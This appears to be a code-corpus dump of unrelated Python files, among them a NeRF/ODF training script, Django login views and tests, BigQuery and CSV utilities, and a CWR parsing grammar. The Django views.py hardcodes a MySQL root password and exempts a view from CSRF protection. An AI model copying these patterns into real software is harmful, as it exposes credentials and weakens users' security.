    parser.add_argument("--save_dir", type=str, default="/gpfs/data/ssrinath/human-modeling/DirectedDF/large_files/", help="a directory where model weights, loss curves, and visualizations will be saved")
    parser.add_argument("-n", "--name", type=str, required=True, help="The name of the model")
    # DATA
    parser.add_argument("--samples_per_mesh", type=int, default=1000000, help="Number of rays to sample for each mesh")
    parser.add_argument("--mesh_file", default="/gpfs/data/ssrinath/human-modeling/large_files/sample_data/stanford_bunny.obj", help="Source of mesh to train on")
    # NOTE: Double check LF4D and Camera class if coord type/ pos enc change
    parser.add_argument("--coord_type", default="direction", help="Type of coordinates to use, valid options are 'points' | 'direction' | 'pluecker' ")
    # NOTE(review): argparse type=bool is a known pitfall -- any non-empty
    # string (including "False") parses as True; use store_true/false instead.
    parser.add_argument("--pos_enc", default=True, type=bool, help="Whether NeRF-style positional encoding should be applied to the data")
    parser.add_argument("--vert_noise", type=float, default=0.02, help="Standard deviation of noise to add to vertex sampling methods")
    parser.add_argument("--tan_noise", type=float, default=0.02, help="Standard deviation of noise to add to tangent sampling method")
    parser.add_argument("--uniform", type=int, default=100, help="What percentage of the data should be uniformly sampled (0 -> 0%, 100 -> 100%)")
    parser.add_argument("--vertex", type=int, default=0, help="What percentage of the data should use vertex sampling (0 -> 0%, 100 -> 100%)")
    parser.add_argument("--tangent", type=int, default=0, help="What percentage of the data should use vertex tangent sampling (0 -> 0%, 100 -> 100%)")
    # MODEL
    parser.add_argument("--lmbda", type=float, default=100., help="Multiplier for depth l2 loss")
    parser.add_argument("--intersect_limit", type=int, default=20, help="Max number of intersections that the network will predict per ray (should be even number)")
    parser.add_argument("--unordered", action="store_true", help="The intersection outputs will have no ordering constraint if this argument is passed")
    # HYPERPARAMETERS
    parser.add_argument("--lr", type=float, default=1e-4, help="Learning rate")
    parser.add_argument("--train_batch_size", type=int, default=1000, help="Train batch size")
    parser.add_argument("--test_batch_size", type=int, default=1000, help="Test batch size")
    parser.add_argument("--epochs", type=int, default=3, help="Number of epochs to train (overrides --iterations)")
    parser.add_argument("--radius", type=float, default=1.25, help="The radius at which all rays start and end (mesh is normalized to be in unit sphere)")
    # ACTIONS
    parser.add_argument("-T", "--train", action="store_true", help="Train the network")
    parser.add_argument("-t", "--test", action="store_true", help="Test the network")
    parser.add_argument("-s", "--save", action="store_true", help="Save the trained network")
    parser.add_argument("-l", "--load", action="store_true", help="Load the model from file")
    parser.add_argument("-d", "--viz_depth", action="store_true", help="Visualize the learned depth map and intersection mask versus the ground truth")
    parser.add_argument("-v", "--video", action="store_true", help="Render a video of the learned mask and depth map compared to the ground truth")
    parser.add_argument("-p", "--pointcloud", action="store_true", help="Generate a point cloud of the object based on the learned ODF")
    parser.add_argument("-m", "--mesh", action="store_true", help="Visualize a mesh generated from rays starting on a sphere surface looking inwards")
    # VISUALIZATION
    parser.add_argument("--show_rays", action="store_true", help="Visualize the camera's rays relative to the scene when rendering depthmaps")
    parser.add_argument("--n_frames", type=int, default=200, help="Number of frames to render if saving video")
    parser.add_argument("--video_resolution", type=int, default=250, help="The height and width of the rendered video (in pixels)")
    args = parser.parse_args()
    # make sure the output directory is setup correctly
    assert(os.path.exists(args.save_dir))
    necessary_subdirs = ["saved_models", "loss_curves"]
    for subdir in necessary_subdirs:
        if not os.path.exists(os.path.join(args.save_dir, subdir)):
            os.mkdir(os.path.join(args.save_dir, subdir))
    model_path = os.path.join(args.save_dir, "saved_models", f"{args.name}.pt")
    loss_path = os.path.join(args.save_dir, "loss_curves", args.name)
    model = LF4D(input_size=(120 if args.pos_enc else 6), n_intersections=args.intersect_limit, radius=args.radius, coord_type=args.coord_type, pos_enc=args.pos_enc).to(device)
    optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
    # Load and normalize the training mesh into the unit sphere.
    mesh = trimesh.load(args.mesh_file)
    faces = mesh.faces
    verts = mesh.vertices
    verts = odf_utils.mesh_normalize(verts)
    sampling_methods = [sampling.sample_uniform_4D,
                        sampling.sampling_preset_noise(sampling.sample_vertex_4D, args.vert_noise),
                        sampling.sampling_preset_noise(sampling.sample_tangential_4D, args.tan_noise)]
    # Mixture weights for the three sampling strategies; must sum to 1.
    sampling_frequency = [0.01 * args.uniform, 0.01 * args.vertex, 0.01*args.tangent]
    assert(sum(sampling_frequency) == 1.0)
    test_sampling_frequency = [1., 0., 0.]
    train_data = MultiDepthDataset(faces, verts, args.radius, sampling_methods, sampling_frequency, size=args.samples_per_mesh, intersect_limit=args.intersect_limit, pos_enc=args.pos_enc)
    test_data = MultiDepthDataset(faces,verts,args.radius, sampling_methods, sampling_frequency, size=int(args.samples_per_mesh*0.1), intersect_limit=args.intersect_limit, pos_enc=args.pos_enc)
    train_loader = DataLoader(train_data, batch_size=args.train_batch_size, shuffle=True, drop_last=True, pin_memory=True, num_workers=args.n_workers)
    test_loader = DataLoader(test_data, batch_size=args.test_batch_size, shuffle=True, drop_last=True, pin_memory=True, num_workers=args.n_workers)
    if args.load:
        print("Loading saved model...")
        model.load_state_dict(torch.load(model_path, map_location=torch.device(device)))
    if args.train:
        print(f"Training for {args.epochs} epochs...")
        model=model.train()
        total_loss = []
        int_loss = []
        depth_loss = []
        for e in range(args.epochs):
            print(f"EPOCH {e+1}")
            tl, il, dl = train_epoch(model, train_loader, optimizer, args.lmbda, args.coord_type, unordered=args.unordered)
            total_loss.append(tl)
            int_loss.append(il)
            depth_loss.append(dl)
            # Loss curves are re-saved every epoch so progress survives a crash.
            odf_utils.saveLossesCurve(total_loss, int_loss, depth_loss, legend=["Total", "Intersection", "Depth"], out_path=loss_path, log=True)
    if args.save:
        print("Saving model...")
        torch.save(model.state_dict(), model_path)
    if args.test:
        print("Testing model ...")
        model=model.eval()
        test(model, test_loader, args.lmbda, args.coord_type, unordered=args.unordered)
    if args.viz_depth:
        print("Visualizing depth map...")
        model=model.eval()
        viz_depth(model, verts, faces, args.radius, args.show_rays)
    if args.pointcloud:
        model = model.eval()
        sphere_vertices, _ = meshing_3d.icosahedron_sphere_tessalation(args.radius, subdivisions=4)
        generate_point_cloud(model, sphere_vertices, verts, faces)
    if args.mesh:
        model = model.eval()
        meshing_3d.make_model_mesh(model, initial_tessalation_factor=3, radius=args.radius, focal_point=[0.,0.,0.])
    if args.video:
        print(f"Rendering ({args.video_resolution}x{args.video_resolution}) video with {args.n_frames} frames...")
        model=model.eval()
        equatorial_video(model, verts, faces, args.radius, args.n_frames, args.video_resolution, args.save_dir, args.name)
    # print name again so it's at the bottom of the slurm output
    print(f"{args.name} finished")
| brown-ivl/DirectedDistanceFunction | train4D.py | train4D.py | py | 23,695 | python | en | code | 2 | github-code | 90 |
18348694269 | import sys
input = sys.stdin.readline  # rebind input() to the faster sys.stdin.readline (competitive-programming idiom)
def I(): return int(input())  # read one integer
def MI(): return map(int, input().split())  # read a line of integers as an iterator
def LI(): return list(map(int, input().split()))  # read a line of integers as a list
def main():
    """Simulate the round-robin scheduling problem: each player has a fixed
    opponent order; a match happens on a day only when both players name each
    other next. Prints the number of days needed, or -1 if impossible."""
    mod=10**9+7  # (unused)
    N=I()
    A=[]
    inf=10**6  # sentinel appended so A[i][cur[i]] is safe once a player is done
    for _ in range(N):
        a=LI()+[inf]
        for j in range(N-1):
            a[j]-=1  # convert opponents to 0-based indices
        A.append(a)
    cur=[0]*N  # cur[i]: how many matches player i has completed
    st=[]  # stack of players to examine; only players whose state changed need re-checking
    nxt=[]
    # Day 1: check everyone; since N >= 3 the tournament cannot finish on day 1.
    for i in range(N):
        for j in range(i+1,N):
            if A[i][0]==j and A[j][0]==i:
                cur[i]=1
                cur[j]=1
                st.append(i)
                st.append(j)
    day=1
    while st:
        used=[0]*N  # players who already played today
        day+=1
        while st:
            i=st.pop()  # player being examined
            j=A[i][cur[i]]  # candidate opponent
            if used[i]==0 and used[j]==0:
                if A[j][cur[j]]==i:  # both name each other next: they play today
                    cur[i]+=1
                    cur[j]+=1
                    nxt.append(i)
                    nxt.append(j)
                    used[i]=1
                    used[j]=1
        while nxt:
            a=nxt.pop()
            if cur[a]!=N-1:  # still has matches left -> re-examine tomorrow
                st.append(a)
    if sum(cur)==N*(N-1):
        print(day)
    else:
        print(-1)
main()
| Aasthaengg/IBMdataset | Python_codes/p02925/s455447579.py | s455447579.py | py | 1,519 | python | ja | code | 0 | github-code | 90 |
71939857257 | from django.core.management import call_command
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from faker import Faker
fake = Faker()
User = get_user_model()
class MiddlewareTests(TestCase):
    """Checks that users with an incomplete profile are redirected to the
    profile-update page, and pass through once the profile is complete."""

    @classmethod
    def setUpTestData(cls):
        call_command("init_membership")
        cls.user = User.objects.create(
            username=fake.user_name(), email=fake.ascii_email()
        )

    def test_complete_user_profile_middleware(self):
        self.client.force_login(self.user)
        # Incomplete profile: middleware redirects to the update page.
        first = self.client.get("/")
        self.assertEqual(first.url, reverse("accounts:update-profile") + "?next=/")
        # Complete the profile, then the original path is served normally.
        profile = self.user.profile
        profile.country = "MU"
        profile.save()
        second = self.client.get("/")
        self.assertEqual(second.request["PATH_INFO"], "/")
| confuzeus/sasaas | {{ cookiecutter.project_slug }}/{{ cookiecutter.project_slug }}/accounts/tests/test_middleware.py | test_middleware.py | py | 856 | python | en | code | 7 | github-code | 90 |
20572640854 | import csv
# Open the "allpro" file in read mode
with open('allpro', 'r') as file:
    # Read the content of the file
    content = file.read()
# Entries are separated by blank lines
entries = content.split('\n\n')
# Create a new CSV file to write the parsed data
with open('parsed_data.csv', 'w', newline='') as output_file:
    # Create a CSV writer object
    csv_writer = csv.writer(output_file)
    # Write the header row to the CSV file
    csv_writer.writerow(['Company', 'Address', 'City', 'State', 'Zip Code', 'Phone'])
    # Iterate over each entry
    for entry in entries:
        # Split the entry into lines
        lines = entry.split('\n')
        # Entries shorter than 3 lines are silently skipped
        if len(lines) >= 3:
            company = lines[0].strip()
            address = lines[1].strip()
            city_state_zip = lines[2].strip()
            phone = lines[-1].replace('Phone:', '').strip()
            # Split the city from the trailing state+zip token
            city, state_zip = city_state_zip.rsplit(' ', 1)
            # NOTE(review): assumes the last token is a 2-letter state fused
            # with the zip (e.g. "NY11201"); if state and zip are separate
            # tokens this mis-splits -- verify against the input format.
            state, zipcode = state_zip[:2], state_zip[2:]
            # Write the parsed data to the CSV file
            csv_writer.writerow([company, address, city, state, zipcode, phone])
| alba-molina-nyc/allpro | par.py | par.py | py | 1,325 | python | en | code | 0 | github-code | 90 |
26295879475 | # -*- coding: utf-8 -*-
"""
Created on Thu Jun 10 12:37:43 2021
@author: Peter
"""
import FindSmallestSphere2Points
import FindSmallestSphere3Points
import FindSmallestSphere4Points
def main(points_array):
    """Find the smallest enclosing sphere of ``points_array`` by trying the
    2-point solver first, then the 3-point solver, and falling back to the
    4-point solver. Returns whichever solver's result is accepted, printing
    which case was used."""
    sphere2 = FindSmallestSphere2Points.main(points_array)
    if sphere2 is not None:
        print("Two point sphere")
        return sphere2
    sphere3 = FindSmallestSphere3Points.main(points_array)
    # Accept the 3-point sphere only when it has a radius and a valid status.
    if sphere3[0] is not None and sphere3[2]:
        print("Three point sphere")
        return sphere3
    print("Four point sphere")
    return FindSmallestSphere4Points.main(points_array)
| georgesquinn/geometric-protein | FindSmallestSphere.py | FindSmallestSphere.py | py | 1,010 | python | en | code | 0 | github-code | 90 |
70278388778 | import six
import os
from dotenv import load_dotenv
from google.cloud import bigquery
load_dotenv()  # pull PROJECT_NAME / DATASET_NAME / BUCKET_NAME from a local .env file
project_name = os.environ.get('PROJECT_NAME')
dataset_name = os.environ.get('DATASET_NAME')
bucket_name = os.environ.get('BUCKET_NAME')
table_name = 'doraneko'
client = bigquery.Client()
# Fully qualified BigQuery table id: <project>.<dataset>.<table>
table_id = f"{project_name}.{dataset_name}.{table_name}"
job_config = bigquery.LoadJobConfig(
    schema=[
        bigquery.SchemaField("name", "STRING"),
        bigquery.SchemaField("post_abbr", "STRING"),
    ],
)
# Seed the table with one in-memory CSV row so it is guaranteed non-empty.
body = six.BytesIO(b"Washington,WA")
client.load_table_from_file(body, table_id, job_config=job_config).result()
previous_rows = client.get_table(table_id).num_rows
assert previous_rows > 0
# Second load: replace the table contents (WRITE_TRUNCATE) with a CSV from
# Cloud Storage, skipping its header row.
job_config = bigquery.LoadJobConfig(
    write_disposition=bigquery.WriteDisposition.WRITE_TRUNCATE,
    source_format=bigquery.SourceFormat.CSV,
    skip_leading_rows=1,
)
uri = f"gs://{bucket_name}/mycsv2.csv"
load_job = client.load_table_from_uri(
    uri, table_id, job_config=job_config
) # Make an API request.
load_job.result() # Waits for the job to complete.
destination_table = client.get_table(table_id)
print("Loaded {} rows.".format(destination_table.num_rows))
| nuevocs/gcp-bq-python | sample-scripts/replace_table.py | replace_table.py | py | 1,182 | python | en | code | 0 | github-code | 90 |
18163025089 | def abc177_e():
    n = int(input())
    A = [int(x) for x in input().split()]
    def prime_factorize(n:int)->set:
        ''' Return the set of distinct prime factors of n. '''
        arr = []
        while n % 2 == 0:
            arr.append(2)
            n = n // 2
        f = 3
        while f*f <= n:
            if n%f == 0:
                arr.append(f)
                n = n // f
            else:
                f += 2
        if n != 1:
            arr.append(n)  # remaining n is itself prime
        return set(arr)
    import math
    gcd_all = A[0]
    # factors[p] == 1 once prime p has appeared in some element of A;
    # seeing it twice means two elements share a factor -> not pairwise coprime.
    factors = [0]*(10**6 + 1)
    pairwise = True
    for ai in A:
        gcd_all = math.gcd(gcd_all, ai)
        for p in prime_factorize(ai):
            if factors[p]: pairwise = False
            factors[p] = 1
    if pairwise: ans = 'pairwise coprime'
    elif gcd_all == 1: ans = 'setwise coprime'
    else: ans = 'not coprime'
    print(ans)
if __name__ == '__main__':
abc177_e() | Aasthaengg/IBMdataset | Python_codes/p02574/s460995164.py | s460995164.py | py | 905 | python | en | code | 0 | github-code | 90 |
38321578350 | """
Meshing: Filter prisms from a 3D prism mesh based on their physical properties
"""
from fatiando import logger, gridder, mesher
from fatiando.vis import myv
log = logger.get()
log.info(logger.header())
log.info(__doc__)
shape = (5, 20, 10)
bounds = (0, 100, 0, 200, 0, 50)
mesh = mesher.PrismMesh(bounds, shape)
# Fill the even prisms with 1 and odd with -1
def fill(i):
    """Return 1 for even prism indices and -1 for odd ones."""
    return 1 if i % 2 == 0 else -1
mesh.addprop('density', [fill(i) for i in xrange(mesh.size)])
# Separate even and odd prisms by filtering on the density value range.
odd = mesher.vfilter(-1, 0, 'density', mesh)
even = mesher.vfilter(0, 1, 'density', mesh)
log.info("Showing solid ODD prisms and wireframe EVEN")
myv.figure()
myv.prisms(odd, prop='density', vmin=-1, vmax=1)
myv.prisms(even, prop='density', style='wireframe', vmin=-1, vmax=1)
myv.axes(myv.outline(bounds))
myv.show()
| fatiando/v0.1 | _static/cookbook/mesher_prismmesh_filter.py | mesher_prismmesh_filter.py | py | 838 | python | en | code | 0 | github-code | 90 |
35962243834 | # Python class
# declare class
class Employee:
    """Minimal employee record demonstrating Python class basics."""

    def __init__(self, name, profile):
        # Store the constructor arguments as instance attributes.
        self.name = name
        self.profile = profile

    def display(self):
        """Print a welcome message for this employee."""
        print("Welcome " + self.name)
# create an instance of the Employee class
e1 = Employee('Pramod' , 'developer')
# read instance attributes
print(e1.name)
print(e1.profile)
# reassign an instance attribute
e1.profile = "Designer"
print(e1.profile)
# delete an instance attribute
del e1.profile
# the line below would raise AttributeError: the attribute was deleted
# print(e1.profile)
# call an instance method
e1.display()
# delete the object binding
del e1
# the line below would raise NameError: the name was deleted
#e1.display() | pramodkoshti/Basic-Python | class.py | class.py | py | 713 | python | en | code | 0 | github-code | 90 |
32490104965 | import random
from imp import reload
import jieba
from django.shortcuts import render
from django.shortcuts import redirect
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
import os
import sys
reload(sys)
from . import models
from . import forms
import hashlib
import datetime
import csv
import pymysql
# Create your views here.
def hash_code(s, salt='mysite'):
    """Return the SHA-256 hex digest of ``s`` concatenated with ``salt``."""
    digest = hashlib.sha256()
    digest.update((s + salt).encode())
    return digest.hexdigest()
def make_confirm_string(user):
    """Create, persist and return an email-confirmation code for ``user``,
    derived from the user's name salted with the current timestamp."""
    timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    code = hash_code(user.name, timestamp)
    models.ConfirmString.objects.create(code=code, user=user)
    return code
@csrf_exempt
def index(request):
if not request.session.get('is_login', None):
return redirect('/login/')
try:
if request.GET:
date = request.GET['date']
else:
date = '2020-03-01'
except:
date = '2020-03-01'
try:
type=request.GET['out']
except:
type = 'in'
with open(r'C:\Users\15503\PycharmProjects\mysite\login\csv文件\youtube词云数据.csv', 'r', encoding='utf-8') as f:
reader = csv.reader(f)
header_row = next(reader)
date1, comment1,num1 = [], [],[]
for row in reader:
date1.append(row[0])
comment1.append(row[1])
num1.append(row[2])
with open(r'C:\Users\15503\PycharmProjects\mysite\login\csv文件\微博词云数据.csv', 'r', encoding='utf-8') as f:
reader = csv.reader(f)
header_row = next(reader)
date2, comment2 ,num2= [], [],[]
for row in reader:
date2.append(row[0])
comment2.append(row[1])
num2.append(row[2])
cy_date=date[-2:]
cy_date=str(int(cy_date))
index=int(cy_date)-1
if type!='in':
cy_comment = eval(comment1[index])
cy_num = eval(num1[index])
else:
cy_comment = eval(comment2[index])
cy_num = eval(num2[index])
db = pymysql.connect("localhost", "root", "20413wrx", "runoob", charset='utf8')
cursor = db.cursor()
cursor.execute("SELECT * FROM 微博疫情评论分析结果")
results = cursor.fetchall()
topic, positive, negative, neutral = [], [], [], []
for row in results:
topic.append(row[0])
positive.append(row[1])
negative.append(int(row[2]))
neutral.append(int(row[3]))
date = date[5:7] + '.' + date[-2:]
ctx = date[-1]
cursor = db.cursor()
cursor.execute("SELECT * FROM 全国疫情情况")
results = cursor.fetchall()
date1, province, confirm, dead, heal = [], [], [], [], []
for row in results:
date1.append(row[0])
province.append(row[1])
confirm.append(int(row[2]))
dead.append(int(row[3]))
heal.append(int(row[4]))
index = []
for i in range(len(date1)):
if date1[i] == date:
index.append(i)
map_province, map_confirm, map_dead, map_heal = [], [], [], []
for i in index:
map_province.append(province[i])
map_confirm.append(confirm[i])
map_dead.append(dead[i])
map_heal.append(heal[i])
name='湖北'
date11='03.01'
if request.POST:
name = request.POST['name']
date1=random.randint(10, 30)
date11='03.'+str(date1)
cursor = db.cursor()
cursor.execute("SELECT * FROM 各省疫情情况")
results = cursor.fetchall()
date1, city, province, confirm, dead, heal = [], [], [], [], [], []
for row in results:
date1.append(row[0])
province.append(row[1])
city.append(row[2])
confirm.append(int(row[3]))
dead.append(row[4])
heal.append(row[5])
index = []
for i in range(len(date1)):
if date1[i] == date11:
index.append(i)
city_name = []
city_confirm = []
for i in index:
if province[i] == name:
city_name.append(city[i])
city_confirm.append(confirm[i])
if name=='湖北':
city_name[2]='襄阳市'
city_name[4] = '恩施土家族苗族自治州'
cursor = db.cursor()
cursor.execute("SELECT * FROM 新增人数")
results = cursor.fetchall()
date, confirm, dead, heal = [], [], [], []
for row in results:
date.append(row[0])
confirm.append(row[1])
dead.append(row[3])
heal.append(row[4])
import json
ctx=int(ctx)+1
cursor = db.cursor()
cursor.execute("SELECT * FROM 湖北人口迁出情况")
results = cursor.fetchall()
ctx_date,ctx_city ,ctx_province= [],[],[]
for row in results:
ctx_city.append(row[0])
ctx_province.append(row[1])
ctx_date.append(float(row[ctx]))
cursor = db.cursor()
cursor.execute("SELECT * FROM 湖北人口迁入情况")
results = cursor.fetchall()
cyx_date,cyx_city,cyx_province = [],[],[]
for row in results:
cyx_city.append(row[0])
cyx_province.append(row[1])
cyx_date.append(float(row[ctx]))
return render(request, 'login/index.html',{
'date': json.dumps(date),'confirm': json.dumps(confirm),'dead': json.dumps(dead),'heal': json.dumps(heal),'ctx_city': json.dumps(ctx_city),'ctx_date': json.dumps(ctx_date),
'cyx_city': json.dumps(cyx_city), 'cyx_date': json.dumps(cyx_date),'ctx_province': json.dumps(ctx_province),'cyx_province': json.dumps(cyx_province),
'map_province': json.dumps(map_province), 'map_confirm': json.dumps(map_confirm), 'map_dead': json.dumps(map_dead),
'map_heal': json.dumps(cyx_province),'city_name': json.dumps(city_name), 'city_confirm': json.dumps(city_confirm),'name': json.dumps(name),
'topic': json.dumps(topic), 'positive': json.dumps(positive),
'negative': json.dumps(negative), 'neutral': json.dumps(neutral), 'cy_num': json.dumps(cy_num), 'cy_comment': json.dumps(cy_comment),
})
def login(request):
if request.session.get('is_login', None): # 不允许重复登录
return redirect('/index/')
if request.method == 'POST':
login_form = forms.UserForm(request.POST)
message = '请检查填写的内容!'
if login_form.is_valid():
username = login_form.cleaned_data.get('username')
password = login_form.cleaned_data.get('password')
try:
user = models.User.objects.get(name=username)
except :
message = '用户不存在!'
return render(request, 'login/login.html', locals())
if user.password == hash_code(password):
request.session['is_login'] = True
request.session['user_id'] = user.id
request.session['user_name'] = user.name
return redirect('/index/')
else:
message = '密码不正确!'
return render(request, 'login/login.html', locals())
else:
return render(request, 'login/login.html', locals())
login_form = forms.UserForm()
return render(request, 'login/login.html', locals())
def register(request):
if request.session.get('is_login', None):
return redirect('/index/')
if request.method == 'POST':
register_form = forms.RegisterForm(request.POST)
message = "请检查填写的内容!"
if register_form.is_valid():
username = register_form.cleaned_data.get('username')
password1 = register_form.cleaned_data.get('password1')
password2 = register_form.cleaned_data.get('password2')
sex = register_form.cleaned_data.get('sex')
if password1 != password2:
message = '两次输入的密码不同!'
return render(request, 'login/register.html', locals())
else:
same_name_user = models.User.objects.filter(name=username)
if same_name_user:
message = '用户名已经存在'
return render(request, 'login/register.html', locals())
new_user = models.User()
new_user.name = username
new_user.password = hash_code(password1)
new_user.sex = sex
new_user.save()
return redirect('/login/')
else:
return render(request, 'login/register.html', locals())
register_form = forms.RegisterForm()
return render(request, 'login/register.html', locals())
def logout(request):
if not request.session.get('is_login', None):
return redirect('/login/')
request.session.flush()
# del request.session['is_login']
return redirect("/login/")
| gerly1980/epidemic_visualization | login/views.py | views.py | py | 8,782 | python | en | code | null | github-code | 90 |
18221204409 | def main():
N = int(input())
A = [int(i) for i in input().split()]
B = [(i+1)+a for i, a in enumerate(A)]
from collections import Counter
c = Counter()
ans = 0
for j in range(N):
i = j
v = (j+1) - A[j]
ans += c[v]
c[B[i]] += 1
print(ans)
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p02691/s528927253.py | s528927253.py | py | 344 | python | en | code | 0 | github-code | 90 |
34400822572 | # -*- coding: utf-8 -*-
import datetime
import pyparsing as pp
from cwr.other import VISAN, AVIKey
from cwr.grammar.field import basic
from config_cwr.accessor import CWRConfiguration
from data_cwr.accessor import CWRTables
"""
Grammar for special cases and other fields.
These are miscellany fields and nodes, such as line limiters, or the character
encoding field.
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
# Acquires data sources
_config = CWRConfiguration()
# GENERAL GRAMMAR
lineStart = pp.lineStart.suppress()
lineStart.setName("Start of line")
lineEnd = pp.lineEnd.suppress()
lineEnd.setName("End of line")
# CONCRETE CASES FIELDS
def ipi_base_number(name=None):
"""
IPI Base Number field.
An IPI Base Number code written on a field follows the Pattern
C-NNNNNNNNN-M. This being:
- C: header, a character.
- N: numeric value.
- M: control digit.
So, for example, an IPI Base Number code field can contain I-000000229-7.
:param name: name for the field
:return: a parser for the IPI Base Number field
"""
if name is None:
name = 'IPI Base Number Field'
field = pp.Regex('I-[0-9]{9}-[0-9]')
# Name
field.setName(name)
field_num = basic.numeric(13)
field_num.setName(name)
field = field | field_num
# White spaces are not removed
field.leaveWhitespace()
return field.setResultsName('ipi_base_n')
def ipi_name_number(name=None):
"""
IPI Name Number field.
An IPI Name Number is composed of eleven digits.
So, for example, an IPI Name Number code field can contain 00014107338.
:param name: name for the field
:return: a parser for the IPI Name Number field
"""
if name is None:
name = 'IPI Name Number Field'
field = basic.numeric(11)
field.setName(name)
return field.setResultsName('ipi_name_n')
def iswc(name=None):
"""
ISWC field.
A ISWC code written on a field follows the Pattern TNNNNNNNNNC.
This being:
- T: header, it is always T.
- N: numeric value.
- C: control digit.
So, for example, an ISWC code field can contain T0345246801.
:param name: name for the field
:return: a parser for the ISWC field
"""
if name is None:
name = 'ISWC Field'
# T followed by 10 numbers
field = pp.Regex('T[0-9]{10}')
# Name
field.setName(name)
# White spaces are not removed
field.leaveWhitespace()
return field.setResultsName('iswc')
def percentage(columns, maximum=100, name=None):
"""
Creates the grammar for a Numeric (N) field storing a percentage and
accepting only the specified number of characters.
It is possible to set the maximum allowed value. By default this is 100
(for 100%), and if modified it is expected to be reduced, not increased.
The three first digits will be for the integer value.
The columns can't be lower than 3.
:param columns: number of columns for this field
:param maximum: maximum allowed value
:param name: name for the field
:return: grammar for the float numeric field
"""
if name is None:
name = 'Percentage Field'
if columns < 3:
message = 'The values can not be lower than 3'
raise pp.ParseException(message)
field = basic.numeric_float(columns, 3)
field.addParseAction(lambda v: _assert_is_percentage(v[0], maximum))
field.setName(name)
return field
def _assert_is_percentage(value, maximum=100):
"""
Makes sure the received value is a percentage. Otherwise an exception is
thrown.
:param value: the value to check
"""
if value < 0 or value > maximum:
message = 'The value on a percentage field should be between 0 and %s' \
% maximum
raise pp.ParseException(message)
def ean_13(name=None):
"""
Creates the grammar for an EAN 13 code.
These are the codes on thirteen digits barcodes.
:param name: name for the field
:return: grammar for an EAN 13 field
"""
if name is None:
name = 'EAN 13 Field'
field = basic.numeric(13)
field = field.setName(name)
return field.setResultsName('ean_13')
def isrc(name=None):
"""
Creates the grammar for an ISRC code.
ISRC stands for International Standard Recording Code, which is the
standard ISO 3901. This stores information identifying a particular
recording.
:param name: name for the field
:return: grammar for an ISRC field
"""
if name is None:
name = 'ISRC Field'
field = _isrc_short(name) | _isrc_long(name)
field.setName(name)
return field.setResultsName('isrc')
def _isrc_short(name=None):
"""
Creates the grammar for a short ISRC code.
ISRC stands for International Standard Recording Code, which is the
standard ISO 3901. This stores information identifying a particular
recording.
This variant contains separator for the parts, and follows the pattern:
CC-XXX-YY-NN
Where each code means:
- CC: country code
- XXX: registrant
- YY: year
- NN: work id
:param name: name for the field
:return: grammar for an ISRC field
"""
config = CWRTables()
if name is None:
name = 'ISRC Field'
# separator = pp.Literal('-')
country = config.get_data('isrc_country_code')
# registrant = basic.alphanum(3)
# year = pp.Regex('[0-9]{2}')
# work_id = pp.Regex('[0-9]{2}')
country_regex = ''
for c in country:
if len(country_regex) > 0:
country_regex += '|'
country_regex += c
country_regex = '(' + country_regex + ')'
field = pp.Regex(country_regex + '-.{3}-[0-9]{2}-[0-9]{2}')
# country.setName('ISO-2 Country Code')
# registrant.setName('Registrant')
# year.setName('Year')
# work_id.setName('Work ID')
field.setName(name)
return field.setResultsName('isrc')
def _isrc_long(name=None):
"""
Creates the grammar for a short ISRC code.
ISRC stands for International Standard Recording Code, which is the
standard ISO 3901. This stores information identifying a particular
recording.
This variant contain no separator for the parts, and follows the pattern:
CCXXXYYNNNNN
Where each code means:
- CC: country code
- XXX: registrant
- YY: year
- NNNNN: work id
:param name: name for the field
:return: grammar for an ISRC field
"""
config = CWRTables()
if name is None:
name = 'ISRC Field'
country = config.get_data('isrc_country_code')
# registrant = basic.alphanum(3)
# year = pp.Regex('[0-9]{2}')
# work_id = pp.Regex('[0-9]{5}')
country_regex = ''
for c in country:
if len(country_regex) > 0:
country_regex += '|'
country_regex += c
country_regex = '(' + country_regex + ')'
field = pp.Regex(country_regex + '.{3}[0-9]{2}[0-9]{5}')
# country.setName('ISO-2 Country Code')
# registrant.setName('Registrant')
# year.setName('Year')
# work_id.setName('Work ID')
field.setName(name)
return field.setResultsName('isrc')
def visan(name=None):
"""
Creates the grammar for a V-ISAN code.
This is a variation on the ISAN (International Standard Audiovisual Number)
:param name: name for the field
:return: grammar for an ISRC field
"""
if name is None:
name = 'V-ISAN Field'
field = pp.Regex('[0-9]{25}')
field.setName(name)
return field.setResultsName('visan')
def audio_visual_key(name=None):
"""
Creates the grammar for an Audio Visual Key code.
This is a variation on the ISAN (International Standard Audiovisual Number)
:param name: name for the field
:return: grammar for an ISRC field
"""
if name is None:
name = 'AVI Field'
society_code = basic.numeric(3)
society_code = society_code.setName('Society Code') \
.setResultsName('society_code')
av_number = basic.alphanum(15, extended=True, isLast=True)
field_empty = pp.Regex('[ ]{15}')
field_empty.setParseAction(pp.replaceWith(''))
av_number = av_number | field_empty
av_number = av_number.setName('Audio-Visual Number') \
.setResultsName('av_number')
field = pp.Group(society_code + pp.Optional(av_number))
field.setParseAction(lambda v: _to_avi(v[0]))
field = field.setName(name)
return field.setResultsName('audio_visual_key')
def _to_avi(parsed):
"""
Transforms the data from an AVI field into an AVIKey instance.
:param parsed: the data parsed from an AVI field
:return: an AVIKey instance created from the data
"""
return AVIKey(parsed.society_code, parsed.av_number)
def date_time(name=None):
"""
Creates the grammar for a date and time field, which is a combination of
the Date (D) and Time or Duration field (T).
This field requires first a Date, and then a Time, without any space in
between.
:param name: name for the field
:return: grammar for a Date and Time field
"""
if name is None:
name = 'Date and Time Field'
date = basic.date('Date')
time = basic.time('Time')
date = date.setResultsName('date')
time = time.setResultsName('time')
field = pp.Group(date + time)
field.setParseAction(lambda d: _combine_date_time(d[0]))
field.setName(name)
return field.setResultsName('date_time')
def _combine_date_time(data):
"""
Combines the received date and time.
:param data: date and time to combine
:return: the date and time combined
"""
return datetime.datetime.combine(data.date, data.time)
def lookup_int(values, name=None):
"""
Lookup field which transforms the result into an integer.
:param values: values allowed
:param name: name for the field
:return: grammar for the lookup field
"""
field = basic.lookup(values, name)
field.addParseAction(lambda l: int(l[0]))
return field
| weso/CWR-DataApi | cwr/grammar/field/special.py | special.py | py | 10,114 | python | en | code | 32 | github-code | 90 |
